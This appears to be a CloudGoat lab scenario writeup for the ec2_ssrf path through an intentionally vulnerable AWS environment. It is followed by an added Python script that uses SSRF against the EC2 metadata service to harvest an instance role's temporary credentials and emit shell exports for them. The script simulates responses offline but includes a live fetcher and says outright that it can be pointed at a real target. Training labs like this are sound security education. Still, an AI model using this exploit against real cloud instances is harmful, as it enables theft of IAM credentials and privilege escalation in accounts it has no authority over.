Size: Medium
Difficulty: Moderate
Command: $ ./cloudgoat.py create ec2_ssrf
- 1 VPC with:
  - 1 EC2 instance
- 1 Lambda Function
- 1 S3 Bucket
- 1 IAM User "Solus"
Goal: Invoke the "cg-lambda-[ CloudGoat ID ]" Lambda function.
Starting as the IAM user Solus, the attacker discovers they have ReadOnly permissions to a Lambda function, where hardcoded secrets lead them to an EC2 instance running a web application that is vulnerable to server-side request forgery (SSRF). After exploiting the vulnerable app and acquiring keys from the EC2 metadata service, the attacker gains access to a private S3 bucket with a set of keys that allow them to invoke the Lambda function and complete the scenario.
- As the IAM user Solus, the attacker explores the AWS environment and discovers they can list Lambda functions in the account.
- Within a Lambda function, the attacker finds AWS access keys belonging to a different user - the IAM user Wrex.
- Now operating as Wrex, the attacker discovers an EC2 instance running a web application vulnerable to server-side request forgery (SSRF).
- Exploiting the SSRF via the `?url=...` parameter, the attacker makes the application fetch the EC2 instance metadata service on their behalf and steals the temporary credentials of the instance's IAM role (access key, secret key and session token).
- Now using the keys from the EC2 instance, the attacker finds a private S3 bucket containing another set of AWS credentials for a more powerful user: Shepard.
- Now operating as Shepard, who has full administrative privileges, the attacker can invoke the original Lambda function to complete the scenario.
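The SSRF-to-metadata step above, as an added example that is not part of CloudGoat or this scenario's own code. It assumes the vulnerable app reflects the body of whatever URL it is told to fetch, that the instance has an IAM role attached, and that the metadata service answers plain GET requests (IMDSv1); the application host, the role name `cg-ec2-role-example` and the credential values are constructed placeholders, and the instance metadata responses are simulated by `fake_fetch` so the script runs offline.

```python
# Added example (not CloudGoat's code): pull instance-role credentials
# through an SSRF into the EC2 metadata service, offline via a fake fetcher.
import json
from urllib.parse import urlencode, urlparse, parse_qs
from urllib.request import urlopen

# Link-local address of the EC2 instance metadata service (IMDS).
IMDS_CREDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


def ssrf_url(app_base, target):
    """URL that makes the vulnerable app fetch `target` on our behalf.
    Assumes the app reflects the fetched body in its own response."""
    return f"{app_base}/?{urlencode({'url': target})}"


def http_fetch(url):
    """Real fetcher for a live target (not used by the offline demo)."""
    with urlopen(url, timeout=10) as resp:
        return resp.read().decode()


def parse_role_credentials(body):
    """Turn the JSON IMDS returns for a role into AWS CLI environment form.
    The session token is mandatory: the key pair alone is rejected by AWS."""
    doc = json.loads(body)
    if doc.get("Code") != "Success":
        raise ValueError(f"unexpected IMDS response: {doc.get('Code')!r}")
    return {
        "AWS_ACCESS_KEY_ID": doc["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": doc["SecretAccessKey"],
        "AWS_SESSION_TOKEN": doc["Token"],
        "expiration": doc["Expiration"],   # temporary creds; note when they lapse
    }


def harvest_credentials(fetch, app_base):
    """Two SSRF round trips: list the attached role name, then read its keys."""
    listing = fetch(ssrf_url(app_base, IMDS_CREDS))
    roles = [line.strip() for line in listing.splitlines() if line.strip()]
    if not roles:
        raise RuntimeError("no IAM role attached to the instance")
    role = roles[0]
    creds = parse_role_credentials(fetch(ssrf_url(app_base, IMDS_CREDS + role)))
    return role, creds


def env_exports(creds):
    """Shell lines that load the stolen session into the AWS CLI."""
    return "\n".join(f"export {k}={v}" for k, v in creds.items()
                     if k.startswith("AWS_"))


# --- constructed sample data standing in for the real instance (assumption) --
FAKE_ROLE = "cg-ec2-role-example"   # placeholder; the real role name is not given
FAKE_IMDS = {
    IMDS_CREDS: FAKE_ROLE + "\n",
    IMDS_CREDS + FAKE_ROLE: json.dumps({
        "Code": "Success",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLEKEYID0000",
        "SecretAccessKey": "constructed/secret/key/0000000000000000",
        "Token": "constructed.session.token",
        "Expiration": "2030-01-01T00:00:00Z",
    }),
}


def fake_fetch(url):
    """Simulates the vulnerable app: returns the body of whatever ?url= names."""
    target = parse_qs(urlparse(url).query)["url"][0]
    return FAKE_IMDS[target]


if __name__ == "__main__":
    role, creds = harvest_credentials(fake_fetch, "http://target.example")
    print(f"# role: {role}")
    print(env_exports(creds))
```

Against a live target, pass `http_fetch` instead of `fake_fetch`. Two checks worth making before moving on: the credentials are temporary, so watch `Expiration`, and all three variables (including `AWS_SESSION_TOKEN`) must be exported or every AWS call will fail with an invalid-token error. If the instance enforces IMDSv2, the GET-only SSRF described here is blocked, because IMDSv2 requires a PUT to obtain a token first.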
A cheat sheet for this route is available here.